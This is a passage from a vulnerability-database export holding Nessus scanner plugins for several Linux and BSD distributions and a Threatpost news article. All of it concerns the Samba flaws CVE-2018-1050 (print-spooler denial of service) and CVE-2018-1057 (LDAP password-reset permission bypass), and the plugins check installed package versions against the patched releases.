'4.5.16';\nelse if (version =~ \"^4\\.6\\.\")\n fix = '4.6.14';\nelse if (version =~ \"^4\\.7\\.\")\n fix = '4.7.6';\n\nif ( !isnull(fix) &&\n (ver_compare(ver:version, fix:fix, regexes:regexes) < 0) &&\n (ver_compare(ver:version, fix:'4.0.0', regexes:regexes) >= 0) )\n{\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Samba\", port, version);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:32:03", "bulletinFamily": "scanner", "description": "Security fix for CVE-2018-1050 CVE-2018-1057\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to 
automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2018-C5C651AC44.NASL", "href": "https://www.tenable.com/plugins/nessus/108349", "published": "2018-03-15T00:00:00", "title": "Fedora 27 : 2:samba / libldb (2018-c5c651ac44)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-c5c651ac44.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108349);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/23 11:21:08\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_xref(name:\"FEDORA\", value:\"2018-c5c651ac44\");\n\n script_name(english:\"Fedora 27 : 2:samba / libldb (2018-c5c651ac44)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2018-1050 CVE-2018-1057\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-c5c651ac44\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 2:samba and / or libldb packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libldb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"samba-4.7.6-0.fc27\", epoch:\"2\")) flag++;\nif (rpm_check(release:\"FC27\", reference:\"libldb-1.3.2-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba / libldb\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:32:48", "bulletinFamily": "scanner", "description": "Bjorn Baumbach discovered that Samba incorrectly validated\npermissions when changing account passwords via LDAP. An authenticated\nattacker could use this issue to change the password of other users,\nincluding administrators, and perform actions as those users.\n(CVE-2018-1057)\n\nIt was discovered that Samba incorrectly validated inputs to the RPC\nspoolss service. An authenticated attacker could use this issue to\ncause the service to crash, resulting in a denial of service.\n(CVE-2018-1050).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3595-1.NASL", "href": "https://www.tenable.com/plugins/nessus/108335", "published": "2018-03-14T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : samba vulnerabilities (USN-3595-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3595-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108335);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_xref(name:\"USN\", value:\"3595-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : samba vulnerabilities (USN-3595-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjorn Baumbach discovered that Samba incorrectly validated\npermissions when changing account passwords via LDAP. An authenticated\nattacker could use this issue to change the password of other users,\nincluding administrators, and perform actions as those users.\n(CVE-2018-1057)\n\nIt was discovered that Samba incorrectly validated inputs to the RPC\nspoolss service. An authenticated attacker could use this issue to\ncause the service to crash, resulting in a denial of service.\n(CVE-2018-1050).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3595-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba and / or samba-dsdb-modules packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"samba\", pkgver:\"2:4.3.11+dfsg-0ubuntu0.14.04.14\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"samba-dsdb-modules\", pkgver:\"2:4.3.11+dfsg-0ubuntu0.14.04.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"samba\", pkgver:\"2:4.3.11+dfsg-0ubuntu0.16.04.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"samba-dsdb-modules\", pkgver:\"2:4.3.11+dfsg-0ubuntu0.16.04.13\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"samba\", pkgver:\"2:4.6.7+dfsg-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"samba-dsdb-modules\", pkgver:\"2:4.6.7+dfsg-1ubuntu3.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-dsdb-modules\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:22:25", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Samba, a SMB/CIFS\nfile, print, and login server for Unix. 
The Common Vulnerabilities and\nExposures project identifies the following issues :\n\n - CVE-2018-1050\n It was discovered that Samba is prone to a denial of\n service attack when the RPC spoolss service is\n configured to be run as an external daemon.\n\n https://www.samba.org/samba/security/CVE-2018-1050.html\n\n - CVE-2018-1057\n Bjoern Baumbach from Sernet discovered that on Samba 4\n AD DC the LDAP server incorrectly validates permissions\n to modify passwords over LDAP allowing authenticated\n users to change any other users passwords, including\n administrative users.\n\n https://www.samba.org/samba/security/CVE-2018-1057.html\n\n https://wiki.samba.org/index.php/CVE-2018-1057", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-4135.NASL", "href": "https://www.tenable.com/plugins/nessus/108304", "published": "2018-03-14T00:00:00", "title": "Debian DSA-4135-1 : samba - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4135. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108304);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_xref(name:\"DSA\", value:\"4135\");\n\n script_name(english:\"Debian DSA-4135-1 : samba - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Samba, a SMB/CIFS\nfile, print, and login server for Unix. 
The Common Vulnerabilities and\nExposures project identifies the following issues :\n\n - CVE-2018-1050\n It was discovered that Samba is prone to a denial of\n service attack when the RPC spoolss service is\n configured to be run as an external daemon.\n\n https://www.samba.org/samba/security/CVE-2018-1050.html\n\n - CVE-2018-1057\n Bjoern Baumbach from Sernet discovered that on Samba 4\n AD DC the LDAP server incorrectly validates permissions\n to modify passwords over LDAP allowing authenticated\n users to change any other users passwords, including\n administrative users.\n\n https://www.samba.org/samba/security/CVE-2018-1057.html\n\n https://wiki.samba.org/index.php/CVE-2018-1057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-1050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-1057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wiki.samba.org/index.php/CVE-2018-1057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4135\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the samba packages.\n\nFor the oldstable distribution (jessie), CVE-2018-1050 will be\naddressed in a later update. 
Unfortunately the changes required to fix\nCVE-2018-1057 for Debian oldstable are too invasive to be backported.\nUsers using Samba as an AD-compatible domain controller are encouraged\nto apply the workaround described in the Samba wiki and upgrade to\nDebian stretch.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 2:4.5.12+dfsg-2+deb9u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ctdb\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libnss-winbind\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libpam-winbind\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libparse-pidl-perl\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libsmbclient\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libsmbclient-dev\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libwbclient-dev\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libwbclient0\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"python-samba\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"registry-tools\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-common\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-common-bin\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-dev\", 
reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-dsdb-modules\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-libs\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-testsuite\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-vfs-modules\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"smbclient\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"winbind\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:40:10", "bulletinFamily": "scanner", "description": "The samba project reports :\n\nMissing NULL pointer checks may crash the external print server\nprocess.\n\nOn a Samba 4 AD DC any authenticated user can change other user", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_FB26F78A26A911E8A1C200505689D4AE.NASL", "href": "https://www.tenable.com/plugins/nessus/108316", "published": "2018-03-14T00:00:00", "title": "FreeBSD : samba -- multiple vulnerabilities (fb26f78a-26a9-11e8-a1c2-00505689d4ae)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108316);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:47\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n\n script_name(english:\"FreeBSD : samba -- multiple vulnerabilities (fb26f78a-26a9-11e8-a1c2-00505689d4ae)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The samba project reports :\n\nMissing NULL pointer checks may crash the external 
print server\nprocess.\n\nOn a Samba 4 AD DC any authenticated user can change other user's\npasswords over LDAP, including the passwords of administrative users\nand service accounts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\"\n );\n # https://vuxml.freebsd.org/freebsd/fb26f78a-26a9-11e8-a1c2-00505689d4ae.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a566c41f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba44\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba45\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba46\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba47\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba44<4.4.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba45<4.5.16\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba46<4.6.14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba47<4.7.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-01-23T05:27:38", "bulletinFamily": "info", "description": "Two critical patches for the free networking software Samba were released Tuesday, addressing vulnerabilities that could allow an unprivileged remote attacker to launch a denial of service attack against servers running the software or allow an adversary to change user passwords, including the admin\u2019s.\n\nSamba, a popular free open source software, allows Windows-based file and print services to be shared via operating systems such as Windows, Linux and UNIX.\n\nThe vulnerability [CVE-2018-1050](<https://www.samba.org/samba/security/CVE-2018-1050.html>) enables hackers to launch denial of service attacks on external print servers, according to the [Samba security release posted Tuesday](<https://www.samba.org/samba/history/security.html>).\n\nAccording to Samba, CVE-2018-1050 has impacted 
all versions of Samba from 4.0.0 and above, and stems from missing null pointer checks that may crash the external print server process.\n\nThe impacted software versions are vulnerable when the Remote Procedure Call (RPC) Microsoft Spool Subsystem service (spoolss) is configured to run as an external daemon program, which runs continuously to handle periodic service requests for systems.\n\nRPC is a model for programming in a distributed computing environment, which provides transparent communication so that the client appears to be communicating directly with the server. Typically, spoolss uses RPC as its transport protocol.\n\nBut due to missing input sanitization checks on some input parameters for spoolss RPC calls, when the service is run as an external daemon it could cause the background print spooler program to crash, said Samba \u2013 which impacts the handling of the transfer of print files in a printer.\n\n\u201cThere is no known vulnerability associated with this error, merely a denial of service. If the RPC spoolss service is left by default as an internal service, all a client can do is crash its own authenticated connection,\u201d said Samba.\n\nSamba has released a [patch](<http://www.samba.org/samba/security/>) addressing this issue in versions 4.7.6, 4.6.14 and 4.5.16. The vulnerability was first discovered by Synopsys\u2019 Defensics intelligent fuzz testing tool, according to Samba.\n\nMeanwhile, the password vulnerability ([CVE-2018-1057](<https://www.samba.org/samba/security/CVE-2018-1057.html>)) exists on all versions of Samba from 4.0.0 and above. 
The vulnerability allows authenticated users to change other users\u2019 passwords.\n\nThis vulnerability incorrectly validates permissions, allowing users to change other users\u2019 passwords \u2013 including the passwords of administrative users and privileged service accounts \u2013 over the Lightweight Directory Access Protocol (LDAP) server on a Samba 4 Active Directory domain controller.\n\nLDAP is a directory service protocol that runs on a layer above the TCP/IP stack, providing a mechanism used to connect to, search and modify internet directories.\n\n\u201cThe LDAP server incorrectly validates certain LDAP password modifications against the \u2018Change Password\u2019 privilege, but then performs a password reset operation,\u201d according to Samba\u2019s release. \u201cThe change password right in AD is an extended object access right with the GUID ab721a53-1e2f-11d0-9819-00aa0040529b.\u201d\n\nAccording to Samba, this vulnerability only impacts the Samba AD domain controller, not the read-only domain controller or the Samba3/NT4-like/classic domain controller.\n\nSecurity researcher Bj\u00f6rn Baumbach, with SerNet, is credited with discovering CVE-2018-1057.\n\nSamba said that while organizations prepare the update for this vulnerability, they can monitor their directory by keeping watch on attributes pwdLastSet and msDS-KeyVersionNumber, which will change if a password has been reset.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/03/13105256/samba.png>)\n\nSamba has grappled with an array of vulnerabilities over the past 12 months, including two SMB-related man-in-the-middle bugs enabling attackers to hijack client connections in [September](<https://threatpost.com/samba-update-patches-two-smb-related-mitm-bugs/128090/>), and a vulnerability in [May](<https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/>) that can be exploited with one line of code and could make way for a 
